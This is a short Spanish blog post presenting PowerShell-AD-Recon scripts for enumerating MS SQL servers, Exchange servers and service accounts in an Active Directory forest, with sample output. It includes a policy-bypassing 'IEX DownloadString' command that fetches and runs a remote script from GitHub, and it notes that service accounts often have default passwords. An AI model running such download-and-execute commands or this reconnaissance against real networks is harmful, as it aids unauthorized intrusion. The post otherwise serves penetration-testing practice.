Scripts PowerShell para enumeración en DA

Interesante repositorio PowerShell-AD-Recon de PyroTek3 en:
https://github.com/PyroTek3/PowerShell-AD-Recon

C:\temp>powershell -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PyroTek3/PowerShell-AD-Recon/master/Discover-PSMSSQLServers'); Discover-PSMSSQLServers"
Processing XX (user and computer) accounts with MS SQL SPNs discovered in AD Forest DC=UNLUCKY,DC=NET

Domain           : UNLUCKY.NET
ServerName       : unlucklaptop.unlucky.net
Port             :
Instance         : SQLEXPRESS
ServiceAccountDN :
OperatingSystem  : {Windows 8.1 Enterprise}
OSServicePack    :
LastBootup       : 1/10/2015 11:47:55 AM
OSVersion        : {6.3 (9600)}
Description      :

Domain           : UNLUCKY.NET
ServerName       : unluckserver.unlucky.net
Port               : 1433
Instance           :
ServiceAccountDN   : {CN=Svc-blahblah,OU=Service Accounts,,DC=unlucky,DC=net}
OperatingSystem    :
OSServicePack      :
LastBootup         : 12/31/1600 4:00:00 PM
OSVersion          :
Description        :
SrvAcctUserID      : svc-userid
SrvAcctDescription : ---SNIP--- 
   

El resto del repo tiene otros scripts también muy útiles.

https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Discover-PSMSExchangeServers
-Encuentra servidores Exchange

 
https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Find-PSServiceAccounts
-Obtiene una lista de todas las cuentas de servicio. Estas son siempre buenas candidatas para encontrar algunas por defecto.

 
https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Get-PSADForestInfo
-Forest Info

 
https://github.com/PyroTek3/PowerShell-AD-Recon/blob/master/Discover-PSInterestingServices
-Busca una lista de atributos a lo largo del bosque. Esto llevará un LARGO tiempo en bosques/dominios grandes.

 

lista por defecto de atributos:
        [String[]] $StandardSPNServiceFilter = ("ADAM","AGPM","bo","CESREMOTE","Dfs","DNS","Exchange","FIMService","ftp","http","IMAP",

"ipp","iSCSITarget","kadmin","ldap","MS","sql","nfs","secshd","sip","SMTP","SoftGrid","TERMSRV",
"Virtual","vmrc","vnc","vpn","vssrvc","WSMAN","xmpp"),

Fuente: carnal0wnage

1 comentarios :